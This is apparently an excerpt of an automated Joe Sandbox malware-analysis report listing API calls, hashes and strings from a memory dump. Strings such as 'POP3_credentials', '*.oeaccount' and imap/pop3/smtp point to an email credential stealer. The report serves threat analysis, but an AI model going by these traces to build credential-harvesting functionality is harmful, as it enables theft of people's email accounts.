                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                      • String ID: %s@gmail.com
                                                      • API String ID: 3261640601-4097000612
                                                      • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                      • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                      • Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                      • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                      APIs
                                                      • memset.MSVCRT ref: 004094C8
                                                      • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                      • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                      • memset.MSVCRT ref: 0040950C
                                                      • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                      • _strcmpi.MSVCRT ref: 00409531
                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                      • String ID: sysdatetimepick32
                                                      • API String ID: 3411445237-4169760276
                                                      • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                      • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                      • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                      • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                      APIs
                                                      • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                      • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                      • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                      • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                      • GetSysColor.USER32(0000000F), ref: 0040B472
                                                      • DeleteObject.GDI32(?), ref: 0040B4A6
                                                      • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                      • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$DeleteImageLoadObject$Color
                                                      • String ID:
                                                      • API String ID: 3642520215-0
                                                      • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                      • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                      • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                      • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                      APIs
                                                      • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                      • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                      • GetDC.USER32(00000000), ref: 004072FB
                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                      • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                      • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                      • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                      • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                      • String ID:
                                                      • API String ID: 1999381814-0
                                                      • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                      • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                      • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                      • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpymemset
                                                      • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                      • API String ID: 1297977491-3883738016
                                                      • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                      • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                      • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                      • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                      APIs
                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                      • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                      • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy$memset
                                                      • String ID: gj
                                                      • API String ID: 438689982-4203073231
                                                      • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                      • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                      • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                      • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm$__aullrem
                                                      • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                      • API String ID: 643879872-978417875
                                                      • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                      • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                      • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                      • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                      APIs
                                                      • memset.MSVCRT ref: 0040810E
                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,7568EB20,?), ref: 004081B9
                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                      • String ID: POP3_credentials$POP3_host$POP3_name
                                                      • API String ID: 524865279-2190619648
                                                      • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                      • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                      • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                      • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$CountInfomemsetstrchr
                                                      • String ID: 0$6
                                                      • API String ID: 2300387033-3849865405
                                                      • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                      • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                      • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                      • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _mbscat$memsetsprintf
                                                      • String ID: %2.2X
                                                      • API String ID: 125969286-791839006
                                                      • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                      • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                      • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                      • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                      APIs
                                                        • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                      • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                      • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                        • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                        • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                        • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                        • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                        • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                        • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                        • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                      • CloseHandle.KERNEL32(?), ref: 00444206
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                      • String ID: ACD
                                                      • API String ID: 1886237854-620537770
                                                      • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                      • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                      • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                      • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                      APIs
                                                      • memset.MSVCRT ref: 004091EC
                                                      • sprintf.MSVCRT ref: 00409201
                                                        • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                        • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                        • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                      • SetWindowTextA.USER32(?,?), ref: 00409228
                                                      • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                      • String ID: caption$dialog_%d
                                                      • API String ID: 2923679083-4161923789
                                                      • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                      • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                      • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                      • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                      • memset.MSVCRT ref: 00410246
                                                      • memset.MSVCRT ref: 00410258
                                                        • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                      • memset.MSVCRT ref: 0041033F
                                                      • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                      • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                      • String ID:
                                                      • API String ID: 3974772901-0
                                                      • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                      • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                      • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                      • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                      APIs
                                                      • wcslen.MSVCRT ref: 0044406C
                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                      • strlen.MSVCRT ref: 004440D1
                                                        • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                        • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                      • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                      • String ID:
                                                      • API String ID: 577244452-0
                                                      • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                      • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                      • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                      • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                      APIs
                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                      • _strcmpi.MSVCRT ref: 00404518
                                                      • _strcmpi.MSVCRT ref: 00404536
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _strcmpi$memcpystrlen
                                                      • String ID: imap$pop3$smtp
                                                      • API String ID: 2025310588-821077329
                                                      • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                      • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                      • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                      • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                      APIs
                                                      • memset.MSVCRT ref: 0040C02D
                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75570A60), ref: 00408EBE
                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408E31
                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                        • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                        • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                        • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                      • API String ID: 2726666094-3614832568
                                                      • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                      • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                      • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                      • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                      APIs
                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                      • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                      • OpenClipboard.USER32(?), ref: 0040C1B1
                                                      • GetLastError.KERNEL32 ref: 0040C1CA
                                                      • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                      • String ID:
                                                      • API String ID: 2014771361-0
                                                      • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                      • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                      • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                      • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                      APIs
                                                      • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
